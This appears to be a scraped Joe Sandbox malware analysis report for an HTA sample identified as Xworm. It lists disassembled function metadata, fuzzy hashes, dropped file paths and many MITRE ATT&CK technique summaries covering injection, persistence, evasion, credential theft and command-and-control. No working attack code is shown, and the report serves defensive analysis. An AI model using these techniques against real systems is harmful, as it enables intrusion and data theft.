Opcode Fuzzy Hash: 234565a7b0f19bb733261fecee9c3ae383a70871258f96c2fa6ea3c52dcc60fa
Instruction Fuzzy Hash: 8001A772E4111566DB14EBA4C952EFFB7ACEF22340F140019BC4563281DA248F08E671

Function 00C554E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C55501
_wcscmp.LIBCMT ref: 00C55513

Strings

#32770, xrefs: 00C5550D

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: a25aa3b684402475554cf302f9fa14337b6638a561e5a56eadb983e7f09502e6
Instruction ID: 396555b6e2e2c0b267c4212491049c6ce4ca935535a4476b76f974790ce05184
Opcode Fuzzy Hash: a25aa3b684402475554cf302f9fa14337b6638a561e5a56eadb983e7f09502e6
Instruction Fuzzy Hash: 61E0D17650022917E720A659AC49F9BF7ACDB55771F000157FD04D7051E560AA4987D4

Function 00C48892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C488A0

Part of subcall function 00C13588: _doexit.LIBCMT ref: 00C13592

Strings

AutoIt, xrefs: 00C48894
Error allocating memory., xrefs: 00C48899

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: dc1f2b3537241b2b0fb5dfa313e2c30fa5237521b801059fd920940cf92de0c8
Instruction ID: 30499bb4374f25e0a067214f323fa41eab22e015d51792714b496be95670b5a1
Opcode Fuzzy Hash: dc1f2b3537241b2b0fb5dfa313e2c30fa5237521b801059fd920940cf92de0c8
Instruction Fuzzy Hash: 0DD02B3138435832D25432A46C0FFCE3F488F0AB55F000036FF08650C38AD585D0A2D9

Function 00C2B4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00C2B544: _memset.LIBCMT ref: 00C2B551

Part of subcall function 00C10B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C2B520,?,?,?,00BF100A), ref: 00C10B79

IsDebuggerPresent.KERNEL32(?,?,?,00BF100A), ref: 00C2B524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BF100A), ref: 00C2B533

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C2B52E

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: aa98c9e522c677e116096ffaec2ed28db67b706e4b16b8a27d8549629505a594
Instruction ID: 28fea436fd08447a6908def8c5f646953c91565e63a2f98035e04e81bc660486
Opcode Fuzzy Hash: aa98c9e522c677e116096ffaec2ed28db67b706e4b16b8a27d8549629505a594
Instruction Fuzzy Hash: 68E06DB12107618BD760AF39E808746BBE0AF04305F108A6DE856C6751DBB4D948DB91

Function 00C30251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00C30091

Part of subcall function 00C6C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00C3027A,?), ref: 00C6C6E7
Part of subcall function 00C6C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C6C6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C30289

Strings

WIN_XPe, xrefs: 00C300A4

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 7e0afc79abaffb829de9754cb5ddc8c4d7fafd8369c5aa902d1c431b72f98147
Instruction ID: dacc99e30e1286aab5d4ce71a881108cb96527e69b47533d5779b54ec4a2c634
Opcode Fuzzy Hash: 7e0afc79abaffb829de9754cb5ddc8c4d7fafd8369c5aa902d1c431b72f98147
Instruction Fuzzy Hash: B8F0C071815509DFCB69DB55C9A97ED7BF8AB08304F340085E146B2160CB719F44DF25

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report c2.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Windows Analysis Report
c2.hta

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre